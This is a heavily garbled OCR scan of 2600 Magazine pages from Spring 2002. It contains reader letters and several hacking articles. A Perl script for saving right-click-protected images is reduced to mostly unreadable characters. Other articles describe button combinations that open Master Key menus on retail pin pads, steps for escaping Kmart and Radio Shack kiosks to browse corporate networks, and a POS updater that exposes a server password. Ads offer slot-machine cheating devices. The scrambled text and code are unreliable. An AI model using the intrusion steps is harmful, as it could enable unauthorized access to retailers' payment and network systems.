government at all to keep the corporations in check.
It A unlx in those places where governments actual! \
represent the people that there s even a chance of
keeping the corporations from systematic ally abusing
the power that inevitnhlx comes from being huge
Dear 2600:
This is in response to Right Click Suppression’
(18:4) by Rob Rohan. The right click suppression, is
not really a problem and it is in fact quite easy to by-
pass by mm- ml nisi \i means, For example, to copy
pictures from the site onto the clipboard, you don't
need rig hi dick. Use Intern cl Explorer {lets you high-
light images) and just highlight the image tor whatever
else you warned to right-click on i using the tell mouse
button. Then simply press the Microsoft context- menu
key (the key between CTRL and ALT on a standard
104-key keyboard it's next to the Microsoft logo
key h Most people I know find this key to be useless,
and some even remove it But, don’t be foq hd . This
key i> quite a boon it axed to- vow advantage. As for
people who don’t have tins key on (heir keyboard, you
can simply high fight the picture anti use ihc menu op
lion: Edit Copy to copy it !n the cUphonn! In any case.
Spring 2002
Page 51
I think this is considerably easier than writing a Java
program to save the picture .
Em re Yu cel
Dear 2600:
Another way to capture a web page is to simply do
Pile, Edit Page in Netscape Communicator, I did this
for a web page that had photos on it and it worked like
a charm.
Inter net Guiltless
Dear 2600:
In your 1 8:4 issue in the article "How to Hack from
a RAM Disk" by Nv, the author recommends destruc-
tion of CD media; ' If you're, really paranoid, you can
torch/ incinerate the CD. I've heard nuking the CD in a
microwave is not 100 percent successful in destroying
data (and it stinks!)."
1 would like to note that these examples (^destroy-
ing CD media are dangerous - fire could gel out of
control. 5 hope no one would actually place CD media
in i heir microwave. There are also some companies
that sell what they term degauss devices that effec-
tively act as belt sunders and grind the CD media until
you are left with dust and u plaslic disc, I have recom-
mended my company not purchase these devices as
they are both expensive and unnecessary.
Recently J found, purely by accident* a very effec-
tive and inexpensive way to destroy CD media without
the use of any machinery or heat, I had Inadvertently
placed a compact disc in a solution of Purex Bleach.
Twenty- four hours later 1 found the disc transformed
to a bath of metallic flakes and a plastic disc. The
process may have taken less than 24 hours to dissolve
the actual metal coating on the plastic disc, but it was
not before 24 hours had lapsed that 1 realized my disc
was in the bleach solution.
Steven Richards
One of the more hnAMstmg in&dmmtn tic is we 've
heard of lately .
Tracking Terrorists
Deal 2600r
I wanted to comment on a reply to one of your
reader s letters. You stated to someone that basically
trying to hack Bin Laden was a stupid idea. I don’t
necessarily agree. Sure, it could be worthless, but
cracking into his bank accounts and such forth would
actually do some good whether you believe it T s a stu-
pid thought or not It would also be helping the Amer-
ican cause a lot if she hacker community united and
did something for the sake of our country. We bitch
anti moan about how much we hate our count ry, yet we.
were all angered by the events in September and ait
were united to help everyone. I mean, it’s very possi-
ble that the govern mens themselves are trying to crack
into Bin Laden Yaccoums,
Chris
First off, we don 'f “bitch amf moan about how
much we hate our country." Ike bitch and moan about
those who continually subvert the principles of democ-
racy and get awax with it. all the while masking them-
selves in patriotic fervar. Second, when was the lust
time vow "c racked into a bank account , " let alone that
of someone who's on a most wanted list - or in this
case on ALL of them? It's not like on TV and nor too
many people seem to think that it is. This l cat Is to the
perception that hackers can be used as some sort of cy-
herarmy, which is about the furthest thing from the-
(ruth. Anyone with even a slight familiarity of the
hacker world would know that we're constantly ques-
tioning, disagreeing, exploring, ami getting into trou-
ble, . Not exactly the kirn! of people who would do well
in a military environment. > We happen to hear from a
sizable number of unhappy hackers who somehow
wind up in military 1 serviced Finally, even if it were
something simple, where do you get the right to be the
judge, juts', and executioner':' Imagine ft everyone took
it upon themselves to impose their brand of justice in
this manner, ff you really want to help, the best thing
vou can do is he observant and notice things that other
people may not notice. Then let people know what you
see. Itt this age where the truth is fleeting and mass
nutnipulation is common, the ability to detect when
something doc rtf f make sense is a valuable one.
Dear 2600:
I'm writing 10 disagree with your analysis that the
government should release an original digital version
of the bin Laden tape. Apparently all digital video
tapes have special "markers 11 for things like time, cam-
era lens settings, etc. It seems silly to think that our
government is good enough to fake bin Laden's image
and voice, but can't fake a few digital markers to go
a I o ng w uh that. Fhc gov ernn ien l did n ' i h a ve to re l ease
any evidence at all, so be lucky you got any. If you re
ject it then reject it, but don’t expect them to pander to
your whims.
Dan
They didn't have to release any evidence at all?
What kind of world do you live in? It is the obligation
of thinking people everywhere to question and analyze
without relying on blind faith. Almost every major con-
flict in the world cun be traced to people who refuse to
even entertain the possibility of seeing something they
don't want to sec, As people with a technical knowl-
edge of such things, it was a lot more than a mere
“whmT'for'us to Warn to see the t mice ode of the tape ,
Them were numerous details attesting to the authentic-
ity that omld have been garnered by seeing these val-
ues. While the y could have been faked, it would take
tin extraordinary amount of effort and lime to get all of
them just right. That's why their release in a timely
manner Hm so essential. And it's a per fa t example of
how hackers can help in these troubled times - by us-
ing some technical knowledge to let the world know if
something makes sense or not. Of course, to do this
properly you have to accept the fact shat you don 's
know the answer until you analyze the data. It s puz-
zling and quite disturbing that she United Smses gov-
ernment wouldn’t want this evidence to he known. Hut
what s even worse is when people close their eyes to
the mere possibility that the facts don't add up.
Page 52
2600 Magazine
Right Click Suppressed
by fMe
The purpose of this article is to provide an e*-
h nsiuEi to "Right Click Suppression by Rob
Rohan in 18:4.
Blocking right clicks, whether on the entire
i, '.sec iff i, Li si images. is growing more and more
popular as a form of weak copyright protection-
i encountered sites attempting to prevent me
saving materia] copyrighted by people other
than the owner of the page!
In addition to the methods mentioned by VI r
than. W indoze users can click on an image and
If i!: 1 . it from the browser to l heir desktop or another
J older to copy (be image Linus users can try the
piovided script.
M
‘ ipjr, ''Script Ninjd bv EVit
iii. : KL iin.1 fhriiihi d* lacafliwu of ti n^'i- u«Ui npUrjuiHliy iJkJwnluuilsUk-
■'■1.1 ■ i . .m I iv ttripH iimaJ on ihs jar-* 'r-n iiki j*l help' fuf n* n mri-rmi'T! in
u i» hik' yiiaiLuin, 1 1* u imom m ii willbf Me^itl
If
> 'iny luuijif.-Si- njil S’anja. . \ti
‘ i • imi, rfi. AispplsciX HxiwiMl ^pniirnL* nnd didn't specify Mp‘
\Mi\ || ■#ARUV=-/ hdfv'l
I
[mu Hsag<- ^nin>d.pi [-fiiti injures) uri] (uHi ur|3„.J\rt H ;
P"'ii l HIA'i iiui.sr rmi m i* filename (' lilnil. dc. ) Ur a lurilipg 4nh.fn' ;
■ • , . ishuii^ LCiv.iktrKiL£‘i rhr iEEidi^tr iWfMtl afctiiy printing p* l. k I (it";
iftil,
j*eml if
- i ; . \i..inrr .1 (i i j -:r. £ Us nuiige-.
v Iii A - (-
■ li
I "ml if
►ft*
I
i Ulll.llX'i = EJ,
i Ih'Jwl rl;ie
4 llm.Mil.fi E-Jt-h | HI
. 0 vUiifj} - CS'ARO V; SkKipm-l
i - u 1 1 ; i i ' . ' i. it i he nrg.ti meiU ’
I' '• \KOV| \L4H7p|«1 " UetJJlklf'eOl
r
ikkU
liUcml if
h ii.if-. lire Ule
■ 1 1 1 • '■■y.'i vAkf iV(Slot*p| -^Tutfmt-ditMnwrtr-
’ la- e'ji n I'ryrtlt Ll£ .HCp^ilH.'
mi nVifC* 'utt» rVniu V \H(j v I 1 *!.:,! .p| 'ji
' HI. I III Nil = (I;
l inij'ntjin If,
■ Iii f r Ll flu'
■ i 1 Lllir fl if I Hi.’ Itf'file, Sthjc++)
t
n 1- ijict.' in itriq^c?
irOlilfiSli. ni£ l =- tetarig/iS
V
ir [i stfi f-itFwlIre U ire in Ui*ppv mn'inci
' ■ h * -fliti 'l -■>]/'. SBklVlinclU
1'cnitlpnpZ £i; J9fe*|jp2 < ft niwi['- +-«■ 1
i
1 1 Jsf-I SJ. - ■ I'hFi-'i |
I
I ■ sop = ^ifiKA",'. SK'Slonf!! !.',
)OfQli>i>fi3 ■ I ; $tou fS' i -. .| i J i- fttefi; £k]g^3-f-+ 1
The Script
The script isninja.pl is designed to get around
that kind of right- click protection w ithout having to
root though the source yourself Supply it with a
lew URLs and it will print all at the scripts i includ-
ing the aue used \o block your rigfcrt-chcks} found
on those pages, along w ith the URLs of the images.
Optionally, it wall download the images and put
them m the current directory. It you want to down-
load the Hash presentations, the midi music, or
whatever, it would be fairly easy to add that to the
script. In the absence of wget, Mr. Rohan's Java
app would also work well. I. hud to dust off my Perl
skills for this, so please forgive me if it's a hit
sloppy
f __
J rLMhl Jin'
Sdcifi SAROV'Skinpl.
!*(!Eijn2 - fhtipi Stmpi,
whttefitfiifO (re V* i
' T.'.‘. '' ’ j . I
SliripZ =idw>(X Slnipl L
ffsod nJiiif
Vi 1 1 1.; List = V(«pp SiLupj SU dtp?] ;
vnnynimi f ■ .
prjnf "tjfjwp Slmaiiri\ii "■
t
h"V^ri. i ui(' i U |ir| Ssinpnrl ");
Iftind it
; flt'iJil far
/(LcihJ ti
n f ■ jJiC'F-e ,i - Li. i fre ■'
UiSfilfl VIihl'I ■ ,j - : -l n 3 "i t i'ii J
1
if If so. fU Jiif Jbu’ kh tk< t'onrn c M.npt> In </m. ! ri|TO
$v,Fiiuiii'+;
prim " : • Script frV-.cmu.n i= =ln '
11 l‘he n^:-srcd nn.f1 lh Hetv iji cas*; a-fiyon- uwm a stupi
f In pi in i Util miMUicT HLTifm iOmi:ibinj'
Vnrvit'.! • 0:
whit^hDf < U> file i
1
prnii S^Je! Stine];
jti'ShlejSlinc] =■- .■'■<>, L'Tipi/i |
(
ItfriMJ if
rPSflbffSJinfl ■ pi.' 1 1
t
ih 'iVne-Scdlj
t
Ifl'C
I Hr i? i.i iZ n
inesnaJ-
fffeld if
Sltmr++:
| #ea (? rehtEe
ireinl ' =r=S!ik1 St'i'tfx .
]#t-ini if
I *ifiwJ J'ekt
f#i;hil fiir
prim *~Hnisliediyn~ :
Spring 2002
Page 53
by dual parallel
d ua I pa r a l lei @ h ot m a ( I .com
In this article I II discuss some variations in a
common pin pad, a couple of hacks at a large re-
tailer. and finally a disturbing trend.
In my last article l discussed the VeriFone
PmPad 1000 and the button presses (all simulta-
neous) needed to access the Master Key, or Mkey.
Variations exist. Some pads are set to access the
Mkey by pressing the bottom right and top right
buttons. But the vast majority are set to access the
Mkey by pressing the bottom right and top left
buttons.
The last article discussed Wal-Mart. This arti-
cle will discuss its failing competitor. Kmart, The
pin pads at every Kmart register arc Checkmate
model CM 2 i 20s. OS l .07. version 2. 1 . One can
gain access to the pin pad by pressing the four
small buttons by the LC D screen, and she two
bottom-most buttons, green Enter and red Cancel,
simultaneously (think Vulcan mind meld). After
an incorrect password. Lhe pad will cycle, verify-
ing the applications that the user has authorized
access to.
Now: from pin pads to PCs. Walking into
Kmart, at the Customer Service counter, one will
immediately see one of two public computers
running BlueLighl.com, K mart’s online shopping
application. These computers, the other residing
in Electronics or sometimes Sporting Goods, run
N 1 4, have LCD monitors, a keyboard, and an en-
closed trackball where the right button is trapped
under plastic. The BlueLight.com application
starts automatically, so logging off or shutting
down just brings the application right back up.
BlueLight.com (v 1.0.55) is an e-commerce
application that features products and a shopping
carl, running on publicly available NT computers
in many K marts across the nation. ITte applica-
tion is a browser, accessing the Internet to trans-
mit selections from the local Kmart to
Kmart.com \ servers (kih ..kmart.com). Blue Light
takes over the machine, running in Lhe fore-
ground. So the first thing to do is to log off by
pressing Qrl+Ail+ Delete and clicking Logoff
The machine will cycle quickly, bringing up the
NT desktop and then the BlueLight app. Now, do
anything to stop the machine from running the
BlueLight app. ! was lucky; there was a primer
configuration problem that popped up an error
window and s Lopped BlueLight,
l left the printer error window atone and
started poking around the desktop. I saw that any-
thing significant that could be accessed from the
Start button was missing. Function keys and Task
Manager were disabled, fhc only thing in the sys-
tem tray w as anti- virus and... the clock. I doubled
clicked the clock and the time was correct Not
for long Windows applications and temporal
anomalies do not mix. So I set the year to 1980,
clicked Apply, and OK. Dr, Watson promptly
crashed.
What can I leverage here? One of the buttons
in the Dr. Watson error window was Help. Click-
ing Help brought up your favorite Contents- In-
dex -Search, I messed around in Help until ! had
the option to search for Windows Help files. This
gave me an Open File dialog box.
Should 1 search the C drive, C:\W1NNT? No,
[ went to Network Neighborhood And there, with
Utile perusing. I saw' vast networks like km-
northamerica, kmintcr national, kih.kmart.com -
way more than I could w rite down without being
noticed.
1 believe Kmart is counting on securing un-
wanted access from the BlueLight computers
(which probably have trusted access) to these
large nets by locking down these NT boxes. As
you can see Lb is isn’t the case.
Finally, 1 w ant to discuss, not a hack, but what
I can only call negligence. Throughout my explo-
rations I examined quite a tew pin pads. And un-
derneath many I would find a sticker with an 800
number and a client number, I 'he 800 numbers
belong to either banks or transaction handling
companies, and the client number is the only au-
thentication needed to access sales, deposit, and
checking account information for a given vendor.
Having deuh with small businesses and having
found these stickers at such. I know that this in-
formation is held closely. It is a shame that some-
one needs only a remote interest to access this
private information
Page 54
2600 Magazine
by c311ph
c3il pti @ hot mail .co m
In the summer and autumn of 2000, Radio
Slacks across the country got a new fixture* the
bcmsoft Internet Center. At the heart of 'these is
'tl course a Compaq Presari o 5000 series. Most are
I ' 600 with 128 MB of ram and no anti-virus
- » I r w u re { yes . b ac kdoor-G/bae k or Ike work we t J
■ nli these ) The computet is linked by cat 5 to a re-
- it er/decodcr box in the back, A Skvstar Ad van-
■>
luge model VSTAT IDO is what this store is
pupped with. The Sky star is connected by coax
i" .i commercial si/e two-way dish in the mot.
I Itose in cities are equipped with, in all likelihood,
I usi I assume this because in the kiosk it gives the
link e to learn about high-speed access by cither
■ 1 or satellite. The stores in rural America are
quipped with what was GiUu-to-Home twww.gi-
m nm). After being called Gi laid o- Home, tl was
i '’named to Siarbaud. Now Radio Shack or Mi-
ott has dropped them for service because they
c slowing the show. Other companies have
noked at Gihit including EchoStar, Russia's Ya
maltelcom. PMSI. ISKRA, etc. Radio Shack has
u ’i witched to Hughes, the current ow ner of our
n He lice satellite TV provider. Only the server
h- chan ged , n one of the eti stomc r equip me n L C i i -
i had prior to the switch put out version two ol
the ii receiver box. a free upgrade to existing cus-
rs, This original setup required you to pur-
i one of two specially configured Compaq
iiiputers, " priced at $999 or % 1299 in addition to
.. ttial satellite equipment and overpriced m-
tuihnoii Since then, about May or June ‘01, both
computers have been discontinued and arc
linger available. From other dealers 3 have
dked to, the lower cost machine wasn’t up to par
tin the system from the beginning. Originally
i !■ i j January or February 01 release was the
1; only version that could run with an existing
ipuLer to hook up to the satellite system. These
H add-on boxes ended up working with only
n oil i one out of every ten computers, So they
Hi j.vc been "’finishing" testing for USB -only add
m I sixes. Since these are always connected, they
i constant assigned IP.
In nine franchise stores for sure, maybe in cor
, ■ * »ie ones also depending on the intellect of the
-in igers and their location (i.c , broadband op-
'■ r- ;■ uw ner s/manage rs have tied into the 2-way
II i io access the Internet for their store s In
connection. They do (his either by use of a
Mic computer set up as a proxy server or with
the supplied Compaq computer itself, depending
o n h o' w s a t e t lie y want ih--.ii s lore's POS a n d Coj i 1 -
paq display computers to be.
I n add i I ion , t ii c C omp a< ] c out pu te rs the mse Ives
are stripped of most functionality. All f-keys are
disabled, you can open " my computer with only
the ed rom drive, Ctrl- All-Del is active but there is
an easier way. When clicking on start. Then docu-
ments. ii you click on "my documents", you get
into the folder. Way too easy. From there you can
navigate as usual, except right clicking. Most of
those options are available on (he tile button any-
way. You have almost all rights including opening
a DOS prompt and access to r%eb.il.
Name Database
All stores (corporate and franchise) keep local
in -store records onEy. Once a month the entire
database is uploaded to Radio Shack’s corporate
oft ice. The old addresses are included in this lor
the purpose of reeenl address/phone number
changes, etc. Then the Radio Shack corporate of
lice crosses this with their previous tiles ft? com-
plete the database update. Then we all get a flyer in
the mail once a month The llyers come at no cost
to your local franchise stores. That is why we are
always asking for your info. It's free advertising.
Also, a recent update to the Radio Shack POS.
found a i www.rudioxhackpos.eoni, A1lzip.exe, a
self-extracting WinZip tile, has let us add all the
zip codes in die U S or per state if we so wish
Most POS updates have both full install (server)
and file only (client). Allzip.exe is installed on the
server only, not any of the client computers. This
creates two lilts in the C:\RSPOSlC3\RSFlLES
directory, the same directory that holds ail inven-
tor): customer name, and most; other database hies.
The files created are Rsallzip.exe and
IVipcode.hms. When you run the exe, you get
your choice of which states you want to add one
or all. You choose which ones, hit OK, then just
entei (he zip code and get the city name You now
don't have to ask she customer how to spell Kala-
mazoo, or wherever they are from. Something in-
teresting happens after the initial installation and
running of RSallzip.exe. When run again ii wants
to connect up to (he Radio Shack corporate server
and look for new updates. When it does, it gives a
basic store info screen that happens to have the
server password listed in plain text.
I hope [ have shed a little light on Radio Shack
doings. Also, I hope all of this info is correct. It
may dtffer between store types and stales.
Spring 2002
Page 55
Happenings
KfifilSTRATlON LS UNDERWAY FOR HZK2 - the llh HOFF]
conference. taking piai;;; July 1?- 1 ■! . ''OO? at rite (lure I Pennsylvania
in New York City! Admission for tlve entire weekend is. £50. You can
(Agister online at www.2600,com or send a check/ money order by
&TM& nr 260Cm2kZ VO Bos 752, MMe Island, NY 1125$
USA. We' ve si cured u special conference rate ai the hotel of S 1 09
for a single oe double. Si 19 triple, 5129 quad. Call 212-7 3.6-5900
and ask lor the H2K2 rale. i You niigln even be able r.o find cheaper
rates at bore I discount sue. on the net.) 'Lhc Hold Pennsylvania is
easily accessible from anywhere in New- York City - it’s directly
across like slrcei from Penn Station on 7ih Avenue. We've got 50,000
sijimre feet to play with and we have lots nl' plans, for this massive
space more than 4 limes the space we had fur Our last confeivuee ll
you have an idea for $ panel or pre^entatiofc, it's not too late! E-mail
speaker*. (fr h2k2.net. We're also looking for participant* to help us fill
this space with interesting projects of all ?kins Inuhnlliu; computer*,
robots, artwork, etc. Email space L*ld k2.net if you're interested in
helping us fill the space. We need a ion of volunteers in ell areas; to
make I his happen. You guessed it: volufllfeerst i ?h2k2 rtci We will
also have space For small vendors who lime things n f interest for
hacker*- H-mail vendors I#h2k2 .net to become part of that. ]f you
wuEitto lake pan m online discussions focusing oh the upcoming
conference, join the H2K2 mailing list hy c -mail mg major-
dome W? 2 600 , c on l and typing ^subscribe h2k2" on the lirst line of
your messijjgc As always, check www.hopc net or www,h2.k2jtei for
updates!
I HITCH HACKER MEETINGS. Every second Sunday of she
month 7 Klaphek organizes u meeting lit the meeting pohtt of the
centra] Motion ofUirevhi in the Netbeidandji. Everyone interesnsd in
hacking related subjects r welcome to show up. 1 bese meeting!; are
similar to the 2600 meetings. We meet around 14 00 i2 pmi m front
of the GWK office month!} We hope n> ree you there' More info
Mm (v iuundai wwu^hphcluil/inedm^hlitiJ
SAN FRANCISCO OFENBSD USERS GROUP - now meeting
i Mice a month ui the Zephyr l ’ale. 2nd Tlimsday ■ U<r iraf. ■ see
hup ://ww w.sfbhug.or g .
SUMMERCON 2002 will take place May 3 1 - June 1 in Washington
DC At the Marital Renaissance im ‘All Am; uiNW by Gallery Bface.
for more info, vt.su www:sumn>cn:ofl r Qig,
for Sale
FREEDOM NTlSfE, (he feature-length 2&QO documentary. is
now: available on video! See the adventure unfold as we try to gel to
the bottom of the Kevin Mitnick story ,md prevent major motion
picture from spreading more lies. Available or VHS iti NTSC tU.S.)
Innnal. 12! minutes, Send $20 to 2600. PO Box 752. Middle island.
NY 1 1953 or order via our online score at www.26t.Kl com,
REAL WORLD HACKING: Interested in rooftops, steam tunnels,
and the like? For a copy ui fnjdtn jrion, the one about going places
you re not supposed to go, rend 52 in PO Box 1 3. Suction E.
Toronto, ON M6H 4E| , Canada
MAKE ANY SLOT MACHINE PAYOirT 2004B0 oudiis Works
on KYJ-s machines. No contact. Also available, blackjack con tilers.
E-mail rocorbalJi tl’atlamiceity 1 , com if you want to discuss it luifher.
WWW.PUOTEO-ONR.f-OM. thotect yourself I Everyone has a
need to be and lire! safe from the outside world Wc carry It full line
of self defense, security, and surveillance products at k>w prices,
I ; v try thing from alarm* to mini cameras ro relescopie batons to stun
gum- and more! Check us out. all major credit cards accepted, Wc
ship worldwide'
CYBERIBCH TECHNOLOGICAL SURVIVAL NEWSLET-
iEK: Bimonthly high tech and low tech DJY information urs self-re-
liance and preparedness edited by 26<X) writer Thomas Icom Topics
include con nmi nieatiiwis, scent ny, weaponry, electronics* alternative
energy, survival medicine, and intelligence operations. Send $12
cash or “payee blank" money order to Cybertech- Ptl Box ML Mar-
iou. CT f>M-t4 or sutrsciilis; via Paypa) on our wvbsiie at
htip^/w ww. Ei com-tech.com/.
MACINTOSH HACKERS can gel all the mac underground tiles on
a professionally published Cl J. bit) Megs of PURE: mac f he/ Eti-
dud&r ihc Thdcon 7 Macintosh security speech, the whole Freaks
M vdiJtq«h Archives and Whacked Mac Archives. S25.00 USD - will
ship intemalionally. Secure Mae. PMB 310. 6(70 W. Lake Mead
Blvd., Las Vegas, NV 89! 08. USA H;ick from yotir Max:'
[LA RN LOCK PICKING lr' L - FAS 7 wiih our new hook Learn
whut they dofiT watd ytm to know Any security nystem can be
b^aicn. many limes right through the front door Be secure, t.eoni the
secrets a ini wtnkncs-. of lode; - s Ilk k If you Waul U 1 gel where you
urc not supposed to be. iNih kmk cmdd he yum auswer. Explore the
en^pbwering world » i Im. r picking, Send twenty bucks to Standard
Puh I scan i. ms, IK') fhn\ 222bHQ, Champaign. IL 6i 825 or visit us ui
www.standurdpublk'ulions.com/dirtx'l^l 6A0.html feot your special
price.
I < >VERTA CCESSCOM, An ml me tiQUIPMBNI and SERV ICES
providing vt.'U with ihc physical Lind records access you need!
OVER 1 50 TELECOM MANUALS are now avaiiahle online Ebr
free vicwing/downhmding at The Synergy Global Network's fully re-
designed website Most bciup available in Adobe. PDF format, Ihty
lire crisp^ clean, suitable fot luinuny. nud L-uinpli tm Update your
phreak Library now heteure it's loo Jute. We don't know how long i h ts
website will be allowed to distribute these manuals, however they
are yours for ihe time b<ing Our website rv free and upen to the pub-
lic, and require^ no purchase of any krinl, a in! is also ficttr from pop-
up (of jsv|> under > advent sc nteu t? as well. PAYPHONE SERVICE
MANUALS TOO! Visit usontine ai: h i tpr//w ww. synerrg ygkib n Inet
works, co in
HATE MICROSOFT? Or dp they ju^i je<m r ;i loul afiertaste? Show
\ i illt <!i ss,i.h sfiLi, 1 ! ion with s “Calvin peeing on Microsoft" slicker.
Sticket is approx, 7 'VI" tuid his nicely sn a ciir window or even cm
the side of your favorite *nix box. Each slicker is mack: »l contitieT'
cial grade vinyl Wnttr and U V ray rt-yi-vtcmt. To itc* a iurmplo go Id
hz t p i^calvinhtrtesmkrosofl-hy permart.net. V-lK) (US l, SiatKNUS)
lor international, fhder The l alviri sticker cmd ttic MS loga is yours
free. That's right, THE MlCROStjR LOGO IS FREE (cat th^t one.
Hill; Send ulh widens ^ CD May ne, TO Box 57 1 791 , Murt ay, Utah
54J57 LISA Ca-'li "i tnctficy orders only, No checks, credit winds., or
COD. Allow 2-;l weeks for delivery via USffS.
BECOME RECOGNIZED us the backer, phreaker. or computet
guai you really are. BROWN TEK COM ha& wide selcctniui tif
clothing and gear especially designed for the computer uudc^runml
From our tOousdjte "Blame the h6ck«s^ i 'km fjCrie*, to CbffeC rnugx.
t> > tihils and i iiJcopl. BROWnTI K COM has wlial you’re kicking
for. Check as oul!
CRYFtO OUTL.AW T-SHIRTS* Govcmmenli around the world
are turning innocent fictjple into crypto outlaws. Where will the mad-
ness end? Cry ptography may be our la^i hope tor privacy From
Ciirvedspacc, the unofficial band qf anareho* capitalism. Get yours al
cu rvcdKpacc.org/mercltandtvi: .hi n hi
Help Wanted
UIRtNG PROFESSIONAL (\TCR.\ETC01VSlfL'fAiV r IS' wilii
joh references only for the follow me; Wi.'hsiie sccunty, pert'ormance
Uj ning, and marketing for online magazine. Please send your bio and
resume lo: j hftarts worth t^yahoi i.com -you can work front home, but
should live in lor around) NYC, ;i' you will need to all end a incding
or two.
NEED ASSISTAN L ’)■' Ip re sc uc/rr:, ■-. , ■. ,. ASC II levt data w h ich urc
prcsemly comprossed/encrypted by some tyi>e nt commercial pro-
gram. Most Jilc-s are rather litrgc, from 30MB to about 600 M B U ■■■
irrg, DOS based search engine for iclricval Please advise if there
exisis .my u.n>1s currently available or anyone who may be ut' help,
ioh iidp4 @hotmai t emu .
I NEED TO BUILD A HIDDEN CAMERA SYSTEM including
sound on a brested budget to take wilh me on my visits with my
Page 56
2600 Magazine
• l lit} in order Id prove chat everviliirig is going well i J k'i 5 Si e- mail
.iny recnTntncfidjiionif Iit love pu ise f4‘ y iihno.com> fax (705 1 330-
M256.
I (K KSMfTHS: ! am in need tit .1 keytnukef from only a piGiuru
H .hi penril sketch ovcF at" u key Pending on Eiming and kucrdran, J
i .i 1^ able to get ihc key far a Saturduv ur Sunday .itiei rmwi meei-
irig. I am i n Kenosha, Wl, so 1 tan only go to Milwaukee or North
1 hi', -ago for meetings. Please e-maif ;ii M i Rterif M ^hotnuii • • tom ill
ntr Jested, make (he subject ■'keymakcj "
Wanted
M3 U [ I OINK \L II, LUSTRA TOIL I'm anting a book mi sr-
LUt iK eiruMmeiirkm. lock pieilinij. bypiiij, safes. alarms, and oilier
nhjects. I need someone expet tended nt teetiiiicsd draw mg 1 - laureate
iirigtiinl black and white illustrations for my hook. I live in the Uai-
las-Fort Worth artji orTwCHS and would prefer snmei me of college
.ige nearby although we could probably manage long (lista-wcc ec>1-
tatauraitvia . Ttiv, till be unpaid far both -of m UdVd the Kiok
acts published, at which poini we'd split the profits equally I intend
in nfter it to J iriiiiipnnfcxnr Delia Press, and have every k.-orafrc.km.‘.e
i hui I hey' II warn to puhlish ti. Flense cotiUcl sue lie
:V il[_ud<icfcer^yatHi(,>.L , ojii if inlet esied!
I I \l Al l HACKERS WANTED IN PITTSBURGH ftw ;i study
'd die h-: lid's, bdutviof. and culture t>l computet hnekcr> 1 ™ offer
mpplete tordideniwlify. I pay 535 i ;>r an interview 1 have rtn con-
nection with any law enfoiveiiient agency. I .un a professor t-merilus
ueLired professor i hui S a-ttmin in [elicit unity ueiive I have clone aa-
iul research for mans iteeaJe.H and have published many articles anti
tout h.ufks 1 win it to jniblish ran article ihn will gs> c an ncctirate,
' L-.LSoi’i:jb[y ityrtiptuhctii- pkturc of what hackers are i tally like - r*n
•v I ntcwtish. m> journal Kuy sensalmijahsm, am) nu law cnbjnctmteni
hype Make un traceable tekpliaiu: call to 41 2-34 3- 35<>b w >i:nd un
irnii-nbk e-nuil irtcs.sa.HC tn hi rebury lekiLima.eraii f ciimpl vied 1 5
interviews so far, .ill with men I am told that there are women hack-
ers but so far none have L-miracied me. 1 meet my respondents in ,j
i Lsblie place. so far mostly ur Srailiuck-. coffee shops Van vein leant
about me by doing □ Google- scorch for Hen. hard! I,jetnf rmai i
KIDNAP PU) BY niflSKCRET SERVICE* charged wif.li
i NAt THOMZRD USE OF AN ACCESS I >I£VK i .ill my comput-
ers t onli.se atcr 1 . 8 years rumaming on sentence Fatbel nl bwo sei k
mg Donation of K's for kids, "Both computef savvy bur now withcml
uirdwarc, software, c-n Am wjUbj! in puy sbtppirvL 1 on domaicd
PC’i, software, And peripheriify, ii nccessini'v Cornuct me tor ship
plfig infn Mr Darren Leon Felder, Sr. 4 7742-B6E L.'nitcd States
Peis hem iary. AttiiUtL (jcodfgki. Rax PMIi. WH MeDunumcti Houle -
v,ud. S.E,, Ulantu, GiHWgNu .303 1 5-4400; or e-raail me at higdur-
; e n 2 Or"? [ # ya hi to .corn,
I I v t k r : k s i i i ;a i t i i a i t; k t - bra/ju a n a D co w ■
| t >NC 'FUNS; ftoswilS cwRfe. sheep. ,ind goal jurat ;uid ;i5s<>.')Mcd
praditel.ii f dairy r>r* ■.. I li.c tsi i fixer- he cm hitrliFiM by Canada sintit- Febru
iry 7IK1I .itrd tJie t. 1 £, Depajlmoiit of Agrivuiiure ■ US DA ' ti-JX re
• Mil ivd the imputation nf runiEnani products limn Kra/i| ftfket
d ,: v ti 2. 2001 bjBCiWjtse c»l enneet ns for bavitic s parte d'orr n c n-
phalapaihy (lSSt:i fmad cow iti.m?asrf). USE is *t1w;iys fatal after tl
I'.tss away in lumen t bra tit [issue Ltmi leaves sponge : 'ikc li J de Boy
oti Bnuii is iifjeniptme to help people uiKlersurnd the Bov h-m
1-ivl caw " is.-. lie. It ist wenlial dial AI S COUNTRJFLS suspend the
-ii i|" ni of beef and dairy products from Brazil so the Bra/itiiin gos •
erumtnl rnay prove svhai is htci und whui iv fiction, ViAtt the BoycvHl
Bmjjl website far awfe infoirinaricm www hriizi lboycott.oip.
Services
M SPECTED OR At * I mn OF a t v ItERCRlML ts ANY
t VI 1FORNIA OR FEDERAL CfHJRl 7 Consult with a. semantic
• an iur Lruui'nittcsS in the Eihcratioit of tQjbnnatkm spCLrudF/i ug in
K'kvr, c nicker, and p ireak He tense. Contact Omar Figueroa, m
' ' J 'Sili 5 59 1 or (41 5 j 9X&-559 ' at omar<& aya.yak- . e Ju ai 5 Uft
•■idw'sy Sjji Francisco. C A 441 ^3 Lice pirrsunrd consul tiition for
f 'i " 1 renders AD consuJ Ilians arc stneiiy confiffcntrnl ainl protected
. the attorney-client privilege,
t Ht M E R C V B ERf Rl M I PROS FT 't FOR now de fends those
■ :Ati gated or charged with thj* type of (. rime. Has jriy been on the
h ■ •sjBe I know how the system works' and how the govern inert!
at tiii'pcE YOl ’ With pro 'Cdtiior? probably wanting yau to serve
n turn i- you need a proven veteran n ini ahomey who knows
■ h ■ h.intflc thew cases and who knows how m defend your righ»s
jiisoti I). Ijumn. L-sii (<i02) 22 -t ’YBER (222-^237 1 . I^umn ^s: Assa-
emtes. 5d>(J N [|t^ r plxi i-, Suitu 12. ITioenix. A/ M5uf4. Free confi-
dential and profess 1 1 hi .d c.unxu] tation
GENERAL PUKINJSE EMAIL IDENTITY AUTHENTICA-
TION SI RVH I lor use Ftotn CGI programs. Legit muire uses only
please . http: if r > pjar. cu u id icuoy ±.f I'J A IS. h t m I
MJ3i l NDERSTfM >D II At KERS UNDERSTOOD. Write me
Cornu Itations are no charge, and proLectod by clergy /chem in i \ ilege
l r..i ined (elec am A elec! r a i >its i ec b hi I Sy s-lj riday tr tec ti ie .m i n
iOMPU TER SIT'D HI FY7SPY. Is j hacker in your computer w
